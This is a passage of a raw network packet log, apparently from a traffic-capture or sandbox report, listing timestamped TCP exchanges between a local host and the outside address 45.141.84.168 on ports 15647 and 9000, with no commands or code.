                                          Nov 28, 2024 13:40:37.670969009 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.671010971 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.683599949 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.683832884 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.695009947 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.695091963 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.695167065 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.695220947 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.697145939 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.697206974 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.699839115 CET90004986545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.699913979 CET498659000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.700011969 CET498659000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.707642078 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.707722902 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.710567951 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.710637093 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.712201118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.712307930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.726793051 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.726886988 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.728163958 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.728245020 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.728247881 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.728281021 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.740914106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.741014957 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.741045952 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.741089106 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.746041059 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.746108055 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.753139973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.757792950 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.757848978 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.758088112 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.767028093 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.767199039 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.774610996 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.774641037 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.774689913 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.779386997 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.779481888 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.784204960 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.784282923 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.798372984 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.803839922 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.803927898 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.807919979 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.807995081 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.815413952 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.815510035 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.819856882 CET90004986545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.827709913 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.827790022 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.832274914 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.832346916 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.847187042 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.847944021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.848128080 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.854959011 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.855005980 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.855006933 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.865305901 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.865366936 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.872093916 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.872143030 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.887237072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.887291908 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.890845060 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.890887022 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.890947104 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.899477005 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.899533987 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.904417038 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.904469967 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.913304090 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.913356066 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.913364887 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.918418884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.918479919 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.928276062 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.928317070 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.928332090 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.942284107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.942296028 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.942343950 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.947387934 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.947510004 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.952231884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.952291965 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.954446077 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.954500914 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.967185974 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.967255116 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.968298912 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.968338966 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.980524063 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.980581045 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.980581045 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.992261887 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.992315054 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.992389917 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.005075932 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.005131006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.005136013 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.010826111 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.010879040 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.016459942 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.016580105 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.024401903 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.024457932 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.029002905 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.029058933 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.029063940 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.029105902 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.038477898 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.038544893 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.048346043 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.048430920 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.056118965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.056188107 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.056220055 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.067219973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.067305088 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.067320108 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.072249889 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.087218046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.087317944 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.088547945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.088609934 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.088617086 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.096030951 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.096129894 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.101027012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.101139069 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.114869118 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.119710922 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.119720936 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.119795084 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.129627943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.129708052 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.129709005 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.136856079 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.137026072 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.148525000 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.148607969 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.153584957 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.153662920 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.168267965 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.168418884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.168631077 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.168677092 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.168678999 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.168718100 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.181267023 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.181360006 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.181387901 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.194838047 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.206114054 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.206186056 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.206278086 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.208782911 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.212553024 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.216344118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.216414928 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.220643997 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.220726967 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.234503984 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.234867096 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.235358000 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.235450983 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.249593973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.249763966 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.249825001 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.257131100 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.261039019 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.263936996 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.263947010 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.264014959 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.268475056 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.268531084 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.268634081 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.272864103 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.273914099 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.273977041 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.288291931 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.288532972 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.288587093 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.288621902 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.297166109 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.297240019 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.297308922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.312051058 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.313911915 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.313977957 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.314054966 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.315002918 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.315062046 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.326606035 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.326617002 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.326695919 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.332295895 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.332700968 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.336666107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.340555906 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.345979929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.348695993 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.354568005 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.354801893 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.354890108 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.368668079 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.370130062 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.370430946 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.370524883 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.382605076 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.384795904 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.388642073 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.392726898 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.394294977 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.394346952 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.406734943 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.409523964 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.412633896 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.432480097 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.432631016 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.434045076 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.434258938 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.437202930 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.440619946 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.451370001 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.452533960 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.458800077 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.460712910 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.469196081 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.469793081 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.469906092 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.482659101 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.489375114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.490111113 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.490221024 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.503226042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.503365993 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.513920069 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.516164064 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.516680002 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.516963959 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.527467966 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.528593063 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.533854961 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.533945084 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.549321890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.549462080 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.549658060 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.554914951 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.554995060 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.556948900 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.556998014 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.572001934 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.572061062 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.572165012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.581363916 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.581549883 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.585964918 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.585975885 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.586014986 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.595834017 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.595932007 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.595976114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.604475021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.604582071 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.610794067 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.610949039 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.611079931 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.623430014 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.624623060 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.633443117 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.633454084 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.633512020 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.636403084 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.636532068 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.636538982 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.636573076 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.637598038 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.647950888 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.648035049 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.653942108 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.656805038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.662003994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.662046909 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.662127018 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.672615051 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.672940016 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.676053047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.676121950 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.690171003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.690237045 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.690336943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.701597929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.701643944 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.704237938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.704320908 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.704382896 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.714387894 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.714651108 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.724494934 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.724554062 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.728254080 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.728317022 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.728363991 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.733923912 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.733988047 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.749655008 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.749820948 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.749870062 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.749870062 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.761806965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.773946047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.774003029 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.774009943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.782305956 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.782316923 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.782377005 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.791367054 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.791412115 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.796056986 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.804975033 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.804985046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.805028915 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.812808037 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.812832117 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.812870026 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.824378014 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.824609995 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.824791908 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.824826956 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.824855089 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.824872971 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.837564945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.837584019 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.837635040 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.849915028 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.849957943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.850059986 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.870506048 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.870556116 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:38.870620012 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.889323950 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:38.893574953 CET156474973045.141.84.168192.168.2.4
